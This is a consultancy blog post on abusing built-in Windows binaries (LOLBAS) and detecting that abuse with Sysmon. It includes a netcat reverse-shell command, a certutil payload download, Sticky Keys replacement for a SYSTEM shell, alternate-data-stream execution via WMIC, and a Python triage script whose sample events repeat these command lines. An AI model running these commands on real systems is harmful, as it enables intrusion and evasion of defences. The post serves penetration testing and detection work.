Mattia Campagnano

Weaponizing Windows Binaries and Scripts (LOLBAS): What's Old Is New Again


Image source: https://www.hacking.reviews/2019/02/lolbas-living-off-land-binaries-and.html

Over the last few years, attackers have leveraged increasingly sophisticated techniques to exploit coding bugs in web applications, as well as security gaps in endpoint detection and response (EDR) systems, endpoint protection platforms (EPPs), and antivirus software.

Security solutions play a cat-and-mouse game with attackers, often trying to catch up and often failing to do so. Most security products focus on detecting malicious payloads dropped on the target machine, whether through phishing, drive-by downloads, or other mechanisms, but often fail to detect and respond to other attack vectors.

One of the latest trends in penetration testing and malware development is to weaponize the so-called Living Off the Land Binaries and Scripts (LOLBAS), i.e. scripts and binaries that ship with Microsoft Windows by default. Attackers and pen testers have long relied on LOLBAS techniques, but there has been a resurgence of interest. Some built-in Windows binaries support functionality that can be abused to compromise the host, but because they are part of Windows and signed by Microsoft, their presence in system activity normally raises no eyebrows. Attackers skilled enough to break in using only signed Windows binaries stand a much better chance of bypassing endpoint detection and response systems and going undetected.

Using LOLBAS, attackers don't need to download or install a third-party executable that could be flagged and blocked and would leave a revealing audit trail, so they can be extremely stealthy and hard to defend against.

This post will demonstrate some hands-on examples of LOLBAS exploitation that the Polito team successfully used in recent engagements, and will analyze how Windows Defender and Sysmon fare in detecting these types of attacks. The Polito team conducted these tests on a Windows 10 Pro virtual machine with Windows Defender real-time protection and Windows Update enabled.

LOLBAS Project

This is the concept behind the LOLBAS project, available at:

https://lolbas-project.github.io/

The LOLBAS Project was developed in an attempt to analyze and list the most important binaries susceptible to being abused for compromising Windows systems.

GTFOBins

A similar project has also been created for UNIX/Linux systems:

https://github.com/GTFOBins

The TTPs (Tactics, Techniques and Procedures) built on Living Off the Land Binaries and Scripts are also catalogued in the MITRE ATT&CK framework, available at https://attack.mitre.org/

MITRE ATT&CK

MITRE ATT&CK is "a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community".

ATT&CK is a useful reference for a closer analysis of the security gaps in an organization that can lead to system compromise, and for understanding where individual security solutions fall short. Most endpoint defense platforms rely on signatures or behavioral patterns: a binary is flagged when its hash matches a known malware sample, when it is not signed by Microsoft or another trusted publisher, or when its behavior matches a known-bad pattern. A Microsoft-signed binary doing something it was designed to do, such as downloading a file or spawning a process, sits in the blind spot of the first two checks, and that is exactly what LOLBAS techniques exploit.

HANDS-ON EXAMPLES

1. Certutil:

Certutil is a standard Windows utility with dual purposes. Its primary function is to dump, display, and configure certification authority (CA) information.

However, it can also be used to download an arbitrary file onto a Windows computer, without any check on the format or content of the file; it can likewise decode a Base64-encoded file, which lets an attacker stage a payload as harmless-looking text and rebuild it on the host.

The Polito testing team successfully used certutil to transfer a malicious file generated with msfvenom, but Windows Defender detected the file as a generic Trojan and removed it. In other words, the delivery technique was stealthy and went unimpeded, but the delivered payload itself, not so much: the transfer is the part that went unnoticed, and what tripped the alarm was a recognizable payload on disk.

2. nc.exe (netcat for Windows):

Netcat for Windows (nc.exe) is not shipped with Windows and is not a Microsoft-signed binary, so strictly speaking it is not a LOLBAS: it has to be brought onto the host, but it is readily available online. Netcat makes it easy to create a reverse shell through its -e option (not supported by every build), and in the Polito team's testing it did not trigger any Defender alerts.

The Polito team used netcat to obtain a reverse shell on a Windows 10 Pro machine, going completely undetected (command run: nc.exe 192.168.1.89 5555 -e cmd.exe). Because nc.exe has to live somewhere on disk, the artifacts to look for are an unsigned executable in a user-writable location, an outbound connection from it, and cmd.exe running with it as the parent process.

3. sethc.exe (Sticky Keys):

Sticky Keys is an accessibility feature that is activated by pressing the SHIFT key five times. If attackers can access the local file system with sufficient privileges, they can replace the executable that implements the feature, C:\Windows\System32\sethc.exe, with a copy of cmd.exe and obtain a command prompt whenever the key combination is pressed. Two details matter in practice: the file is owned by TrustedInstaller, so an attacker needs administrative rights and has to take ownership (or access the disk offline) to overwrite it, and because the key combination also works at the logon screen, the spawned cmd.exe runs as SYSTEM before anyone has logged on.

This approach can be used to run a wide range of follow-on actions, including adding a new user, thereby achieving persistence on the target machine. The same effect is commonly achieved without touching the file by registering cmd.exe as a debugger for sethc.exe under the Image File Execution Options registry key, so monitoring should cover both the binary and that key.

4. extrac32.exe:

The binary extrac32.exe is used to extract CAB archives, but it can also copy a file into an alternate data stream (ADS) of another file. In this test, testers placed a hidden executable (Process Explorer) in an ADS of a file called file.txt; the displayed size of file.txt did not change, because Explorer and a plain dir listing only report the primary data stream (dir /r, or Get-Item -Stream * in PowerShell, reveals the extra stream). They then launched the executable straight from the stream using wmic process call create, without triggering any Defender alerts. The Windows Management Instrumentation Command Line (WMIC) can be used to automate Windows administration tasks and also to launch processes from the command line.

5. Findstr.exe:

findstr searches for strings within text files, but it can be abused as a copy primitive: with the /V switch it prints every line that does not contain the search string, so searching a binary for a string that does not occur in it echoes the whole file, and the output can be redirected into a new file or into an alternate data stream as in the previous example.

No Defender alerts were triggered whatsoever, even after launching the resulting executable through the Windows Management Instrumentation Command Line (WMIC).

Along the same lines, attackers can create a fake service using the same tricks and then start it through the Windows Management Instrumentation Command Line (WMIC), again without being detected.

DETECTION RESPONSES

Apart from the msfvenom payload in example 1, which Defender flagged once it was on disk, none of the techniques in examples 1 through 5 triggered any alerts in Windows Defender during the Polito team's tests.

However, after deploying Sysmon on the target machine, the above attacks created specific, detectable event logs on the target system.

Sysmon is a free Microsoft endpoint tool available for Windows, part of the Sysinternals tools, that "provides detailed information about process creations, network connections, and changes to file creation time. By collecting the events it generates using Windows Event Collection or SIEM agents and subsequently analyzing them, you can identify malicious or anomalous activity and understand how intruders and malware operate on your network". Sysmon logs provide additional insights that are often invaluable for an Incident Response (IR) or a Threat Hunting team.

In order to understand how Sysmon can improve incident response and threat hunting capabilities on a Windows system, we'll analyze some examples of the event IDs it generated on the target machine.

Sysmon logs are found in Event Viewer (eventvwr.exe) under Applications and Services Logs/Microsoft/Windows/Sysmon/Operational.

Below is the Sysmon log (Event ID 1, Process Create) generated when the executable from example 5 was launched.

Also, while Windows Defender didn't detect the network connection created with nc.exe in example 2, Sysmon logged the process creation (Event ID 1) with its full command line, along with a further Event ID 1 for the whoami command run through the remote shell (the network connection itself is logged as Event ID 3 once Sysmon is installed with the -n switch or a configuration that enables network logging). Without Sysmon on the system, default Windows logs would in many cases show nothing suspicious about these events: the built-in process creation event (Security log 4688) is off by default, and even when enabled it omits the command line unless the "Include command line in process creation events" policy is turned on as well.
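As an added example (not part of the original post, and not Polito's tooling or a Sysmon feature), the following Python script applies one triage rule per technique from examples 1 through 5 to Sysmon-style event records. The field names (Image, CommandLine, ParentImage, TargetFilename, DestinationIp, DestinationPort) are the ones Sysmon writes for Event IDs 1, 3, 11 and 15. The nc.exe command line is the one quoted in example 2; the certutil -urlcache, extrac32 /Y /C, findstr /V /L and wmic process call create command lines use each tool's documented syntax, but the events themselves, file paths and the payload names are constructed for illustration, not captured from the test machine.

```python
"""Triage rules for the LOLBAS techniques in examples 1-5, run over
constructed Sysmon-style events. Added example, not Polito's or Sysmon's code."""
import ntpath
import re
from dataclasses import dataclass

# Accessibility binaries winlogon can launch from the logon screen as SYSTEM.
ACCESSIBILITY_BINARIES = {"sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
                          "magnify.exe", "displayswitch.exe", "atbroker.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
# A shell whose parent lives outside these trees is an odd sight.
TRUSTED_PARENT_PREFIXES = ("c:\\windows\\", "c:\\program files")
# A second colon after the drive letter marks an NTFS alternate data stream.
ADS_PATH = re.compile(r'[a-z]:\\[^\s":]+:[^\s"\\:]+', re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    rule: str
    event_id: int
    detail: str


def _base(path):
    return ntpath.basename(str(path or "")).lower()


def _cmdline(e):
    return str(e.get("CommandLine", ""))


def certutil_download(e):  # example 1: the switches, not the binary, are the tell
    if e["EventID"] == 1 and _base(e.get("Image")) == "certutil.exe":
        if re.search(r"-urlcache|-decode|-verifyctl", _cmdline(e), re.I):
            return "certutil used to fetch or decode a file: " + _cmdline(e)
    return None


def netcat_shell(e):  # example 2: nc.exe with -e
    if e["EventID"] == 1 and _base(e.get("Image")) in {"nc.exe", "nc64.exe", "ncat.exe"}:
        if re.search(r"\s-e\s", _cmdline(e)):
            return "netcat -e reverse shell: " + _cmdline(e)
    return None


def shell_from_untrusted_parent(e):  # example 2: cmd.exe whose parent is nc.exe
    if e["EventID"] == 1 and _base(e.get("Image")) in SHELLS:
        parent = str(e.get("ParentImage", "")).lower()
        if parent and not parent.startswith(TRUSTED_PARENT_PREFIXES):
            return f"{_base(e['Image'])} spawned by {parent}"
    return None


def outbound_from_user_dir(e):  # example 2: Event ID 3 from a user-writable path
    if e["EventID"] == 3 and str(e.get("Image", "")).lower().startswith("c:\\users\\"):
        return f"{e['Image']} -> {e.get('DestinationIp')}:{e.get('DestinationPort')}"
    return None


def accessibility_binary_written(e):  # example 3: sethc.exe replaced
    if e["EventID"] == 11 and _base(e.get("TargetFilename")) in ACCESSIBILITY_BINARIES:
        return f"{e['TargetFilename']} written by {e.get('Image')}"
    return None


def alternate_data_stream(e):  # examples 4 and 5: named stream or ADS path on a command line
    if e["EventID"] == 15:
        return f"named stream created: {e.get('TargetFilename')}"
    if e["EventID"] == 1:
        m = ADS_PATH.search(_cmdline(e))
        if m:
            return "ADS path on command line: " + m.group(0)
    return None


def wmic_launch(e):  # examples 4 and 5: process or service started through WMIC
    if e["EventID"] == 1 and _base(e.get("Image")) == "wmic.exe":
        cl = _cmdline(e).lower()
        if re.search(r"\bprocess\b.*\bcall\b.*\bcreate\b", cl) or \
                re.search(r"\bservice\b.*\bstartservice\b", cl):
            return "WMIC used to launch: " + _cmdline(e)
    return None


def findstr_copy(e):  # example 5: findstr /V with its output redirected
    if e["EventID"] == 1 and re.search(r"\bfindstr(\.exe)?\b.*\s/v\b.*>", _cmdline(e), re.I):
        return "findstr /V used to copy a file: " + _cmdline(e)
    return None


RULES = (certutil_download, netcat_shell, shell_from_untrusted_parent, outbound_from_user_dir,
         accessibility_binary_written, alternate_data_stream, wmic_launch, findstr_copy)


def triage(events):
    """One Finding per (event, rule) match, in event order."""
    return [Finding(r.__name__, e["EventID"], r(e)) for e in events for r in RULES if r(e)]


def rules_fired(events):
    """Matches per rule; a quick check that every technique leaves a trace."""
    counts = {}
    for f in triage(events):
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


# Constructed events (not captured); paths and payload names are assumptions.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://192.168.1.89/payload.exe C:\Users\Public\payload.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil.exe -dump"},  # benign use, must not fire
    {"EventID": 1, "Image": r"C:\Users\Public\nc.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "nc.exe 192.168.1.89 5555 -e cmd.exe"},
    {"EventID": 3, "Image": r"C:\Users\Public\nc.exe", "DestinationIp": "192.168.1.89", "DestinationPort": 5555},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Users\Public\nc.exe", "CommandLine": "cmd.exe"},
    {"EventID": 11, "Image": r"C:\Windows\System32\cmd.exe", "TargetFilename": r"C:\Windows\System32\sethc.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\extrac32.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"extrac32 /Y /C C:\Users\Public\procexp.exe C:\Users\Public\file.txt:procexp.exe"},
    {"EventID": 15, "Image": r"C:\Windows\System32\extrac32.exe", "TargetFilename": r"C:\Users\Public\file.txt:procexp.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\wbem\WMIC.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'wmic process call create "C:\Users\Public\file.txt:procexp.exe"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c findstr /V /L W3AllLov3LolBas C:\Users\Public\procexp.exe > C:\Users\Public\file.txt:procexp.exe"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.rule}] EventID {f.event_id}: {f.detail}")
```

The rules deliberately key on switches, parent/child relationships and stream paths rather than on the binary names alone, since certutil, extrac32, findstr and wmic are all legitimate on every host; the benign certutil -dump record is there to show that. In practice the records would come from the Sysmon/Operational channel via a SIEM or log forwarder rather than from an inline list.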

Wrap-up

It has been said recently that antivirus and intrusion detection/prevention systems (IDS/IPS) have made a comeback, and that launching vanilla Mimikatz and Meterpreter payloads won't cut it anymore, even with encryption.

LOLBAS (Living Off the Land Binaries and Scripts) and GTFOBins (for UNIX/Linux) are incredibly useful resources for identifying and abusing tools installed on almost every machine across multiple stages of the attack kill chain, such as restricted shell escapes, privilege escalation, covert file transfers, and data exfiltration. This attack vector is no guarantee of success per se, though, because much depends on the detection and logging capabilities of the target system. The skill set and experience level of the IR or Threat Hunting team can make a big difference to the outcome.

Getting a shell on a target system has become increasingly difficult for red teamers and pen testers. EDR and AV solutions have greatly stepped up their game and detect many common payloads. Because attackers and pen testers reused the same payloads for years, EDR vendors have had time to incorporate the well-known signatures from VirusTotal and other sources, so a payload created with tools such as msfvenom is increasingly likely to be caught. Machine-learning classifiers and faster response capabilities have made this approach more scalable and easier to keep current, regardless of the obfuscation, encoding, or other evasion techniques applied to the payload.

An increasingly common answer to this challenge is to write custom payloads and/or to rely on LOLBAS. Most of the binaries and scripts in the LOLBAS catalog have underlying functionality that can be abused to compromise a target system, yet they are signed, or at least published, by Microsoft, so security products and defenders alike tend to overlook them.

Polito team firmly believes this is the future of penetration testing and we’ll continue to see LOLBAS increasingly being used by bad guys to evade endpoint defenses.

Is your organization ready for this new scenario?

The Polito team is here to help you meet this challenge. Our team members have extensive professional experience in handling LOLBAS-related attack vectors, and can help you every step of the way, whether you need Penetration Testing, Incident Response, or Threat Hunting services. Our penetration testers are certified professionals who go the extra mile to provide a real service to our customers. We strive for excellence and take great pride in the work we do for our customers.

Polito, Inc. offers a wide range of security consulting services including threat hunting, penetration testing, vulnerability assessments, incident response, digital forensics, and more. If your business or your clients have any cyber security needs, contact our experts and experience what Masterful Cyber Security is all about.

Phone: 571-969-7039

E-mail: info@politoinc.com

Website: politoinc.com

References:

https://www.varonis.com/blog/the-malware-hiding-in-your-windows-system32-folder-more-alternate-data-streams-and-rundll32/

https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/

https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/

https://docs.microsoft.com/en-us/archive/blogs/askcore/alternate-data-streams-in-ntfs

https://attack.mitre.org/techniques/T1015/

https://attack.mitre.org/techniques/T1034/

https://attack.mitre.org/techniques/T1105/

https://ired.team/offensive-security/persistence/t1084-abusing-windows-managent-instrumentation


© 2020 by Polito, Inc. All rights reserved. Privacy Policy.